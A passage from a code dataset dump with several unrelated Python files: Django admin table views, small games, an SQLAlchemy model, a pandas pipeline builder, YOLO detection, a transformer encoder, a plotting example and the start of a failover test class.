db_customer_transaction_json (request):\n obj = m.CustomerTransaction.objects.all()\n serializer =s.CustomerTransactionSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\n# ------------------------- Table views\n\ndef db_view_customer(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.Customer.objects.all()\n data_table = m.CustomerTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"CUSTOMER TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_customer_trans(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.CustomerTransaction.objects.all().order_by('-TRANSACTION_ID')\n data_table = m.CustomerTransactionTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"CUSTOMER TRANSACTION TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_customer_trans_status(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.CustomerTransactionStatus.objects.all().order_by('-TRANSACTION_ID')\n data_table = m.CustomerTransactionStatusTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"CUSTOMER TRANSACTION STATUS TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_shop(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.Shop.objects.all()\n data_table = m.ShopTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"SHOP TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_sub_category(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.SubCategory.objects.all()\n data_table = m.SubCategoryTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"SUB CATEGORY TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_assistance_avail(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.AssistanceAvail.objects.all()\n data_table = m.AssistanceAvailTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"ASSISTANCE AVAILABILITY TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\ndef db_view_assistance(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n queryset = m.Assistance.objects.all()\n data_table = m.AssistanceTable(queryset)\n\n context = {\n \"table\" : data_table,\n \"title\" : \"ASSISTANCE TABLE\"\n }\n return render(request, \"db_view.html\", context)\n\n# ------------ Table update\ndef customer_profile_create(request):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n form = CustomerCreationForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.user = request.user\n instance.save()\n messages.success(request, \"Successfully Created\")\n return HttpResponseRedirect(instance.get_absolute_url())\n context = {\n \"form\": form,\n \"title\" : \"Create Customer Profile\"\n }\n return render(request, \"form.html\", context)\n\ndef assistance_update(request, asst_id=None):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n instance = get_object_or_404(m.Assistance, ASST_ID=asst_id)\n form = AssistanceForm(request.POST or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n info_message = \"Assistance \" + asst_id + \" Profile Saved\"\n messages.success(request, info_message ,\n extra_tags='html_safe')\n return HttpResponseRedirect(instance.get_absolute_url())\n\n context = {\n \"form\": form,\n \"title\" : \"Update Assistance Profile\"\n }\n return render(request, \"form.html\", context)\n\ndef customer_trans_update(request, trans_id=None):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n instance = get_object_or_404(m.CustomerTransaction, TRANSACTION_ID=trans_id)\n form = CustomerTransactionForm(request.POST or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n info_message = \"TRANSACTION_ID \" + trans_id + \" Saved\"\n messages.success(request, info_message ,\n extra_tags='html_safe')\n return HttpResponseRedirect(instance.get_absolute_url())\n\n context = {\n \"form\": form,\n \"title\" : \"Update Customer Transaction\"\n }\n return render(request, \"form.html\", context)\n\ndef customer_update(request, customer_id=None):\n if not request.user.is_staff or not request.user.is_superuser:\n raise PermissionDenied(\"Please login as Admin/Staff role to access this page.\")\n\n instance = get_object_or_404(m.Customer, CUSTOMER_ID=customer_id)\n form = CustomerForm(request.POST or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n info_message = \"TRANSACTION_ID \" + customer_id + \" Saved\"\n messages.success(request, info_message ,\n extra_tags='html_safe')\n return HttpResponseRedirect(instance.get_absolute_url())\n\n context = {\n \"form\": form,\n \"title\" : \"Update Customer Profile\"\n }\n return render(request, \"form.html\", context)\n","sub_path":"src/pingow_api/db_access/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"359208195","text":"elements = input().split()\n\ncommand = input()\nmoves = 0\nwin = False\nwhile command != \"end\":\n moves += 1\n data = command.split()\n index_1 = int(data[0])\n index_2 = int(data[1])\n\n if not win:\n if index_1 < 0 or index_1 > len(elements) - 1 or index_2 < 0 or index_2 > len(elements) - 1:\n middle = len(elements) // 2\n elements.insert(middle, f\"-{moves}a\")\n elements.insert(middle, f\"-{moves}a\")\n print(\"Invalid input! Adding additional elements to the board\")\n\n elif elements[index_1] == elements[index_2]:\n element = elements[index_1]\n print(f\"Congrats! You have found matching elements - {elements[index_1]}!\")\n elements.remove(element)\n elements.remove(element)\n\n elif elements[index_1] != elements[index_2]:\n print(\"Try again!\")\n\n if len(elements) == 0:\n print(f\"You have won in {moves} turns!\")\n win = True\n\n command = input()\n\nif not win:\n print(f\"Sorry you lose :(\\n{' '.join(str(i) for i in elements)}\")\n","sub_path":"Python-Fundamentals/Mid-Exam/Practice-Exams/Exam-12.08.2020/03_memory_game.py","file_name":"03_memory_game.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"408011514","text":"\n\"\"\"\n * @author Dhinakar Panneer Selvam\n * Date Created: 01/21/2018\n * This class is doamin model for Ticket and it is used for cc team to taken care of SARRequest\n \"\"\"\n\n\nimport datetime\n\nfrom project.server import db, bcrypt\nfrom flask import current_app\n\nfrom sqlalchemy import inspect\nfrom sqlalchemy.dialects.mysql import BIGINT\nfrom sqlalchemy.ext.declarative import declarative_base\n\nimport json\n\n\nBase = declarative_base()\n\n\nclass Ticket(db.Model):\n # an email field and a password field\n uid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n type = db.Column(db.String(120))\n time = db.Column(BIGINT)\n changetime = db.Column(BIGINT)\n component = db.Column(db.String(100))\n severity = db.Column(db.String(120))\n priority = db.Column(db.String(120))\n owner = db.Column(db.String(120))\n reporter = db.Column(db.String(120))\n cc = db.Column(db.String(120))\n version = db.Column(db.String(120))\n milestone = db.Column(db.String(120))\n status = db.Column(db.String(120))\n resolution = db.Column(db.String(120))\n summary = db.Column(db.String(120))\n description = db.Column(db.String(120))\n keywords = db.Column(db.String(120))\n product = db.Column(db.String(120))\n id = db.Column(db.Integer)\n sar_id = db.Column(db.Integer, db.ForeignKey('sar.id'))\n created_time = db.Column(db.DateTime, default=datetime.datetime.now())\n modified_time = db.Column(db.DateTime, default=None)\n ticketinfo2 = db.relationship('TicketInfo', lazy='dynamic',\n backref=db.backref('tickets', lazy='joined'))\n #ticket_id = db.Column(db.Integer, db.ForeignKey('ticket.uid'), nullable=False)\n\n def __init__(self, data, id, sar_id=None):\n self.type = data[\"type\"]\n # self.updated_on = data[\"updated_on\"]\n self.component = data[\"component\"]\n self.severity = data[\"severity\"]\n self.priority = data[\"priority\"]\n self.owner = data[\"owner\"]\n self.reporter = data[\"reporter\"]\n self.cc = data[\"cc\"]\n self.version = data[\"version\"]\n self.milestone = data[\"milestone\"]\n self.status = data[\"status\"]\n self.resolution = data[\"resolution\"]\n self.summary = data[\"summary\"]\n self.description = data[\"description\"]\n self.keywords = data[\"keywords\"]\n self.product = data[\"product\"]\n # self.modified_time = data[\"modified_time\"]\n self.id = id\n self.sar_id = sar_id\n\n def to_dict(self):\n return {c.key: getattr(self, c.key) for c in inspect(self).mapper.column_attrs}\n","sub_path":"SAR_WEBSERVICE/project/server/models/Ticket.py","file_name":"Ticket.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"570963315","text":"# -*- coding:utf-8 -*-\nimport abc\nimport sys\nimport inspect\nimport types\nimport itertools\nimport networkx as nx\nfrom pandaspipe.util import patch_list, isSubset\nfrom pandaspipe.base import PipelineEntity\nimport logging\n\n_log = logging.getLogger(__name__)\n_log.addHandler(logging.StreamHandler(stream=sys.stdout))\n\n\nclass Pipeline:\n def __init__(self, name='Undefined Pipeline', env=None):\n \"\"\"(Pipeline, str) -> NoneType\n Creating the contents of the Pipeline Object\n \"\"\"\n if env is None:\n env = {}\n self._entities = []\n self.name = name\n self.env = env\n self.graph = None\n\n def process(self, channels=('root',), ignore_outlet_node=False, output_channels=()):\n \"\"\"(Pipeline, pandas.DataFrame, str) -> type(df_map)\n *Description*\n :param ignore_outlet_node:\n \"\"\"\n start_nodes = [self._get_start_node(channel) for channel in channels]\n active_dfs = {}\n active_nodes = []\n acomplete_nodes = self.graph.nodes()\n complete_nodes = []\n active_nodes.extend(start_nodes)\n while len(active_nodes) > 0:\n next_nodes = []\n processed = False\n for active_node in active_nodes:\n pred_nodes = self.graph.pred.get(active_node).keys()\n depencencies = active_node.external_dependencies\n if (len(pred_nodes) == 0 or isSubset(complete_nodes, pred_nodes)) and isSubset(active_dfs.keys(), depencencies):\n _log.info('Call entity %s' % active_node)\n processed = True\n # Process\n parameters = [active_dfs[channel] for channel in active_node.input_channels]\n if active_node.type in ('node', 'bignode'):\n external_dependencies = {}\n if active_node.external_dependencies:\n for external_dependency in active_node.external_dependencies:\n external_dependencies[external_dependency] = active_dfs[external_dependency]\n self.env['ext_dep'] = external_dependencies\n result = active_node(*parameters)\n active_nodes.remove(active_node)\n complete_nodes.append(active_node)\n acomplete_nodes.remove(active_node)\n # Update active dataframes\n if len(active_node.output_channels) == 1:\n active_dfs[active_node.output_channels[0]] = result\n elif len(active_node.output_channels) > 1:\n active_dfs.update(result)\n # Add next nodes\n for node in self.graph.succ.get(active_node).keys():\n if node not in active_nodes and node not in next_nodes:\n next_nodes.append(node)\n if not processed:\n _log.error('Infinite cycle detected!')\n return None\n active_nodes.extend(next_nodes)\n # Clear useless dfs\n # Check if required by next node\n for channel in active_dfs.keys():\n if channel not in output_channels and len(\n [active_node for active_node in active_nodes if channel in active_node.input_channels]) == 0:\n # Check if required by external dependencies\n required = reduce(lambda x, y: x or y, [channel in node.external_dependencies for node in acomplete_nodes], False)\n if not required:\n active_dfs.pop(channel)\n if len(active_dfs.keys()) == 1:\n return active_dfs.values()[0]\n return active_dfs\n\n def append(self, cls, channel=None, output_channel=None, construct_arguments=()):\n \"\"\"(Pipeline, classobj, str, str) -> NoneType\n *Description*\n :param construct_arguments:\n :param cls:\n :param channel:\n :param output_channel:\n \"\"\"\n self(channel, output_channel, construct_arguments=construct_arguments)(cls)\n\n def build_process_graph(self):\n builder = GraphBuilder(self._entities)\n return builder.build()\n\n def _check_graph(self):\n if self.graph is None:\n self.graph = self.build_process_graph()\n\n def _get_start_node(self, channel):\n self._check_graph()\n nodes = filter(lambda x: channel in x.output_channels and x.type == 'source', self.graph.nodes())\n if len(nodes) > 0:\n return nodes[0]\n raise Exception('You can\\'t use channel without source node')\n\n def _process_entity(self, cls, channel, outchannel, construct_arguments, priority):\n \"\"\"(Pipeline, type(cls), type(channel), type(outchannel),\n type(entity_map)) -> type(cls)\n *Description*\n \"\"\"\n obj = cls(*construct_arguments)\n obj.env = self.env\n if priority:\n obj.priority = priority\n obj.register(self)\n self._entities.append(obj)\n if channel is None and len(obj.input_channels) == 0 and len(obj.output_channels) == 0:\n channel = 'root'\n if channel:\n if outchannel is None:\n outchannel = channel\n if obj.type == 'node':\n obj.input_channels = channel[:1] if isinstance(channel, list) else [channel]\n obj.output_channels = outchannel[:1] if isinstance(outchannel, list) else [outchannel]\n elif obj.type == 'bignode':\n patch_list(obj.input_channels, channel)\n patch_list(obj.output_channels, outchannel)\n elif obj.type == 'source':\n obj.input_channels = []\n patch_list(obj.output_channels, outchannel)\n elif obj.type == 'outlet':\n patch_list(obj.input_channels, channel)\n obj.output_channels = []\n else:\n raise Exception('Well, you use bad type for entity ....')\n return cls\n\n def __call__(self, channel=None, outchannel=None, construct_arguments=(), priority=None):\n \"\"\"(Pipeline, str, str) ->\n type(process_function)\n *Description*\n \"\"\"\n\n def process_function(cls):\n \"\"\"(type(cls)) ->\n type(self._process_entity(cls, channel, outchannel, self._filters))\n *Description*\n :param cls:\n \"\"\"\n cls_mro = inspect.getmro(cls)\n if PipelineEntity in cls_mro:\n self._process_entity(cls, channel, outchannel, construct_arguments, priority)\n return cls\n\n if inspect.isclass(channel) or isinstance(channel, abc.ABCMeta):\n cls = channel\n channel = None\n return process_function(cls)\n\n return process_function\n\n\nclass GraphBuilder:\n\n def __init__(self, entities):\n self.entities = entities\n self.channel_io_nodes = {}\n self.graph = nx.DiGraph()\n pass\n\n def build(self):\n self.graph.add_nodes_from(self.entities)\n self._build_inchannel_connections()\n self._build_multichannel_connections()\n self._validate_external_dependencies()\n return self.graph\n\n def _build_inchannel_connections(self):\n all_channels = set(\n itertools.chain(*map(lambda x: set(itertools.chain(x.input_channels, x.output_channels)), self.entities)))\n for channel in all_channels:\n # Process simple nodes\n channel_nodes = filter(lambda x: x.type == 'node'\n and channel in x.input_channels and channel in x.output_channels,\n self.entities)\n channel_nodes.sort(key=lambda x: (x.priority, x.__class__.__name__))\n self.channel_io_nodes[channel] = {}\n if len(channel_nodes) > 0:\n self.channel_io_nodes[channel]['input'] = channel_nodes[0]\n self.channel_io_nodes[channel]['output'] = channel_nodes[-1]\n # noinspection PyCompatibility\n for i in xrange(0, len(channel_nodes) - 1):\n self.graph.add_edge(channel_nodes[i], channel_nodes[i + 1])\n # Process outlet and source\n input_nodes = filter(lambda x: x.type == 'source' and channel in x.output_channels, self.entities)\n assert len(input_nodes) in (0, 1), 'You can\\'t use many input nodes for one channel'\n if len(input_nodes) > 0:\n if len(channel_nodes) > 0:\n self.graph.add_edge(input_nodes[0], self.channel_io_nodes[channel]['input'])\n else:\n self.graph.add_node(input_nodes[0])\n self.channel_io_nodes[channel]['output'] = input_nodes[0]\n output_nodes = filter(lambda x: x.type == 'outlet' and channel in x.input_channels, self.entities)\n self.graph.add_nodes_from(output_nodes)\n if len(output_nodes) > 0:\n self.channel_io_nodes[channel]['outlets'] = output_nodes\n if len(channel_nodes) > 0:\n for output_node in output_nodes:\n self.graph.add_edge(self.channel_io_nodes[channel]['output'], output_node)\n pass\n\n def _build_multichannel_connections(self):\n for node in filter(lambda x: x.type in ('bignode', 'node') and x.input_channels != x.output_channels,\n self.entities):\n for input_channel in node.input_channels:\n self.graph.add_edge(self.channel_io_nodes[input_channel]['output'], node)\n for output_channel in node.output_channels:\n channel_info = self.channel_io_nodes[output_channel]\n if not channel_info.get('input') and not channel_info.get('outlets'):\n raise Exception('You have problem with graph')\n if channel_info.get('input'):\n self.graph.add_edge(node, channel_info['input'])\n if channel_info.get('outlets'):\n for outlet in channel_info.get('outlets'):\n self.graph.add_edge(node, outlet)\n\n def _validate_external_dependencies(self):\n\n pass\n","sub_path":"pandaspipe/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":10315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"507926195","text":"import Tkinter as Tk\n\nclass KnightGame:\n def __init__(self):\n self.canvas_width = 500\n self.canvas_height = 500\n self.tiles = {}\n self.canvas = Tk.Canvas(root, width = self.canvas_width, height = self.canvas_height) \n self.canvas.pack()\n self.currentRow = 0\n self.currentColumn = 0\n def knight_tour(self, n):\n numRows = n\n numColumns = n\n cellWidth = int(self.canvas_width/numColumns)\n cellHeight = int(self.canvas_height/numRows)\n for column in range(numColumns):\n for row in range(numRows):\n x1 = column * cellWidth\n y1 = row * cellHeight\n x2 = x1 + cellWidth\n y2 = y1 + cellHeight\n tile = self.canvas.create_rectangle(x1,y1,x2,y2, fill='white')\n self.tiles[row, column] = tile\n self.canvas.tag_bind(tile, \"<1>\", lambda event, row=row, column=column: self.newTile(row, column)) \n currentTile = self.canvas.itemconfigure(self.tiles[0,0], fill=\"orange\") \n def newTile(self, row, column): #make current tile orange\n tile = self.tiles[row, column]\n tile_color = self.canvas.itemcget(tile, \"fill\")\n new_color = \"orange\"\n old_color = \"blue\"\n dx = abs(row - self.currentRow)\n dy = abs(column - self.currentColumn)\n oldTile = self.tiles[self.currentRow, self.currentColumn]\n #if legal, change to orange & change old tile to blue & push positions to variables row and column \n if (dx==1 and dy==2) or (dx==2 and dy==1):\n self.canvas.itemconfigure(tile, fill=new_color) #change current tile to orange\n self.canvas.itemconfigure(oldTile, fill=old_color) #change old tile to blue\n self.currentRow = row\n self.currentColumn = column\n #if not legal, dont do anything\n else:\n print(\"Illegal move. Try again.\")\n\nroot = Tk.Tk()\ngui = KnightGame()\ngui.knight_tour(5) #takes in any value 'n' to make board\nroot.mainloop()\n","sub_path":"knightsTour.py","file_name":"knightsTour.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"298839572","text":"# Import libraries\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport glob\nimport time\n\ndef get_output_layers(net): #Hàm đọc tên các nhãn.\n layer_names = net.getLayerNames()\n\n output_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n return output_layers\ndef draw_prediction(img, class_id, confidence, x, y, x_plus_w, y_plus_h): #Hàm vẽ bounding box lên các ảnh\n label = str(classes[class_id])\n\n color = COLORS[class_id]\n\n cv2.rectangle(img, (x, y), (x_plus_w, y_plus_h), color, 2)\n\n cv2.putText(img, label + str(confidence) , (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\ndef drawBox(image, points): #Hàm vẽ các bounding box.\n height, width = image.shape[:2]\n for (label, xi,yi, wi, hi) in points:\n center_x = int(xi * width)\n center_y = int(yi * height)\n w = int(wi * width)\n h = int(hi * height)\n # Rectangle coordinates\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n cv2.rectangle(image, (x, y), (x + w, y + h), black, 1)\n return\ndef savePredict(pathSave, name, text): #Hàm lưu các file txt có format: label 0.xxxx 0.yyyy 0.wwww 0.hhhhh\n textName = pathSave + '/' + name + '.txt'\n with open(textName, 'w+') as groundTruth:\n groundTruth.write(text)\n groundTruth.close()\n\npathImg= r\"images-optional\"\n#Đia chỉ để các file ảnh để model dự đoán đối tượng\npathDirection = r\"detection-results\"\n#Địa chỉ để xuất output dự đoán của model\nprint(\"start\")\nfor img in glob.glob(pathImg + '/*.jpg'): # load lần lượt các ảnh trong folder để detect\n name = img.split('images-optional')[-1].split('.')[0]\n image = cv2.imread(img)\n #Đọc ảnh\n Width = image.shape[1]\n Height = image.shape[0]\n scale = 0.00392\n #Đoc chiều dài và rộng của ảnh\n\n classes = None\n with open(\"/dia_chi_file/yolo.names\", 'r') as f: # Thay đổi địa chỉ của fiell yolo.names tại đây\n classes = [line.strip() for line in f.readlines()]\n\n COLORS = np.random.uniform(0, 255, size=(len(classes), 3))\n #Random màu để vẽ bounding box\n net = cv2.dnn.readNet(\"yolov3-tiny.weights\", \"yolov3-tiny.cfg\") #Thay đổi tên và địa chỉ file weight và file cfg tại đây\n blob = cv2.dnn.blobFromImage(image, scale, (416, 416), (0, 0, 0), True, crop=False)\n #cvt ảnh sang dạng blob\n net.setInput(blob)\n\n outs = net.forward(get_output_layers(net))\n #print(outs)\n class_ids = []\n confidences = []\n boxes = []\n conf_threshold = 0.5 # Ngưỡng detect. Nếu xác suất đối tượng >0.5 thì nó mới được xem là một đối tượng đúng\n # Giảm nếu model không cần độ chính xác cao, tăng nếu model cần độ chính xác cao\n nms_threshold = 0.4\n \n #start = time.time()\n for out in outs: #Xuất các đối tượng được predict\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > conf_threshold:\n #print(confidence)\n center_x = int(detection[0] * Width)\n center_y = int(detection[1] * Height)\n w = int(detection[2] * Width)\n h = int(detection[3] * Height)\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n #print(w,h,x,y)\n class_ids.append(class_id)\n confidences.append(float(confidence))\n boxes.append([x, y, w, h])\n\n indices = cv2.dnn.NMSBoxes(boxes, confidences, conf_threshold, nms_threshold)\n #lưu file txt\n Result = \"\"\n for i in indices:\n i = i[0]\n box = boxes[i]\n x = box[0]\n y = box[1]\n w = box[2]\n h = box[3]\n textpredict = \"{} {} {} {} {} {}\\n\".format(str(class_ids[i]), confidences[i], x, y, x+w, y+h)\n Result += textpredict\n savePredict(pathDirection, name, Result)\n \n","sub_path":"FinalProject/Code_Evaluate/Detect_By_Yolo_in_Forder.py","file_name":"Detect_By_Yolo_in_Forder.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"89412296","text":"from django.urls import reverse\nfrom django.http import Http404\n\n\nclass RestrictStaffToAdminMiddleware(object):\n \"\"\"A middleware that restricts staff members access to administration panels.\"\"\"\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request, *args, **kwargs):\n if request.path.startswith(reverse('admin:index')):\n if request.user.is_authenticated:\n if not request.user.is_staff:\n raise Http404\n else:\n raise Http404\n return self.get_response(request)\n\n def process_request(self, request):\n if request.path.startswith(reverse('admin:index')):\n if request.user.is_authenticated():\n if not request.user.is_staff:\n raise Http404\n else:\n raise Http404\n","sub_path":"simple_blog/accounts/middleware/restrict_admin_page_middleware.py","file_name":"restrict_admin_page_middleware.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"950185","text":"import torch\nimport torch.nn as nn\nimport math\nfrom .utils.transformer_utils import *\nfrom .embedding.transformer_embedding import *\nfrom .attention.transformer_attention import *\nimport copy\n\ndef clones(module, N):\n \"Produce N identical layers.\"\n return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\nclass Encoder(nn.Module):\n \"Core encoder is a stack of N layers\"\n def __init__(self, layer, N):\n super(Encoder, self).__init__()\n self.layers = clones(layer, N)\n self.norm = LayerNorm(layer.size)\n \n def forward(self, x, mask=None):\n \"Pass the input (and mask) through each layer in turn.\"\n for layer in self.layers:\n x = layer(x, mask)\n #return self.norm(x).view(x.size(0),-1)\n return self.norm(x)\n\nclass EncoderLayer(nn.Module):\n \"Encoder is made up of self-attn and feed forward (defined below)\"\n def __init__(self, size, self_attn, feed_forward, dropout):\n super(EncoderLayer, self).__init__()\n self.self_attn = self_attn\n self.feed_forward = feed_forward\n self.sublayer = clones(SublayerConnection(size, dropout), 2)\n self.size = size\n\n def forward(self, x, mask=None):\n \"Follow Figure 1 (left) for connections.\"\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))\n return self.sublayer[1](x, self.feed_forward)\n\ndef make_model(N,d_model,h,d_ff,seq_len,vocab_size,dropout=0.1):\n '''\n N: number of stack\n d_model: d_model\n h: head\n d_ff: inner hidden layer\n input_size: this is for final DNN\n output_size: this is for final DNN\n '''\n c = copy.deepcopy\n attn = MultiHeadedAttention(h,d_model)\n FFN = PositionwiseFeedForward(d_model,d_ff)\n enc = EncoderLayer(d_model,c(attn),c(FFN),dropout)\n final_encoder = Encoder(enc,N)\n word_embedding = Embeddings(d_model,vocab_size)\n pos_emb = PositionalEncoding(d_model,dropout)\n \n final_model = nn.Sequential(\n final_encoder\n )\n \n for p in final_model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n return final_model,word_embedding,pos_emb","sub_path":"model/encoder/Transformer.py","file_name":"Transformer.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"81960380","text":"\"\"\"\nThis example shows how to read a large text file exported by the Merlin software\nand make our contourf plots.\n\nAuthor: James E. T. Smith \nDate: 3/7/2020\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\n\nfrom msanalysis.data_extraction import read_exported_txt\nfrom msanalysis.plotting.contour import contourf\nfrom msanalysis.data_processing.smoothing import moving_average\nfrom msanalysis.sample_data import get_txt_sample_path\n\n#\n# User defined variables\n#\ntxt_file = get_txt_sample_path()\n# txt_file = \"/home/james/Downloads/1-2260 (all).txt\"\n\n# Set this path to\nmz, intensities = read_exported_txt(txt_file)\nmz_lb, mz_ub = (60, 280)\n\nkeep_ith_scan = 1\nX, Y, Z = contourf(mz, intensities, mz_lb, mz_ub, keep_ith_scan=keep_ith_scan)\n\n#\n# Plot\n#\nplt.figure()\n\n# Plot with NO log scale and NO smoothing\nplt.subplot(3, 1, 1)\nplt.contourf(X * keep_ith_scan, Y, Z)\ncbar = plt.colorbar()\ncbar.ax.set_ylabel(\"Intensity (mV)\", rotation=270, fontsize=12, labelpad=15)\nplt.title(\"Regular Scale and No Smoothing\")\n\n\n# Plot with log scale and NO smoothing\nlog_min = Z.min() * 50\n\nplt.subplot(3, 1, 2)\nplt.contourf(X * keep_ith_scan, Y, Z, norm=colors.LogNorm(vmin=log_min, vmax=Z.max()))\ncbar = plt.colorbar()\ncbar.ax.set_ylabel(\"Log(Intensity)\", rotation=270, fontsize=12)\nplt.title(\"Log Scale and NO Smoothing\")\n\n\n# Plot with log scale AND smoothing\nplt.subplot(3, 1, 3)\nX, Y, Z = contourf(\n mz, moving_average(intensities, n=5), mz_lb, mz_ub, keep_ith_scan=keep_ith_scan\n)\nplt.contourf(X * keep_ith_scan, Y, Z, norm=colors.LogNorm(vmin=log_min, vmax=Z.max()))\ncbar = plt.colorbar()\ncbar.ax.set_ylabel(\"Log(Intensity)\", rotation=270, fontsize=12)\nplt.title(\"Log Scaling and Smoothing\")\n\n\nplt.ylabel(\"MZ\")\nplt.xlabel(\"Scan Number\")\nplt.tight_layout()\nplt.savefig(\"figures/ex4.png\", dpi=600)\nplt.show()\n","sub_path":"examples/04_read_exported_txt.py","file_name":"04_read_exported_txt.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"348028211","text":"\"\"\"\nthis is an example plugin for uranium.\n\nplugins allow additional functionality to be added to uranium.\n\"\"\"\n\n\nclass ExamplePlugin(object):\n\n def __init__(self, uranium, part):\n self.uranium = uranium\n self.part = part\n self.egg_spec = part['versions']\n\n def install(self):\n for egg, version in self.egg_spec.items():\n if egg in self.uranium.config.versions:\n continue\n self.uranium.config.versions[egg] = version\n\n update = install\n","sub_path":"uranium/example_plugin.py","file_name":"example_plugin.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"449474001","text":"# Copyright 2015 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE_2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom system_test import testcase\nfrom system_test.tests import ActionTest\nfrom system_test.actions import BaseActions\nfrom system_test.actions import FillRootActions\n\n\n@testcase(groups=['system_test',\n 'system_test.failover',\n 'system_test.failover.filling_root'])\nclass FillRootPrimaryController(ActionTest, BaseActions, FillRootActions):\n \"\"\"Fill root filesystem on primary controller and check pacemaker\n\n Scenario:\n 1. Setup master node\n 2. Config default repositories for release\n 3. Bootstrap slaves and make snapshot ready\n 4. Revert snapshot ready\n 5. Create Environment\n 6. Add nodes to Environment\n 7. Run network checker\n 8. Deploy Environment\n 9. Run network checker\n 10. Run OSTF\n 11. Make or use existing snapshot of ready Environment\n 12. Get pcs initial state\n 13. Fill root filesystem on primary controller\n above rabbit_disk_free_limit of 5Mb\n 14. Check for stopping pacemaker resources\n 15. Run OSTF Sanity and Smoke tests\n 16. Fill root filesystem on primary controller\n below rabbit_disk_free_limit of 5Mb\n 17. Check for stopped pacemaker resources\n 18. Run OSTF Sanity and Smoke tests\n 19. Clean up space on root filesystem on\n primary controller\n 20. Check for started pacemaker resources\n 21. Run OSTF Sanity, Smoke, HA\n \"\"\"\n\n actions_order = [\n 'setup_master',\n 'config_release',\n 'make_slaves',\n 'revert_slaves',\n 'create_env',\n 'add_nodes',\n 'network_check',\n 'deploy_cluster',\n 'network_check',\n 'health_check',\n 'save_load_environment',\n 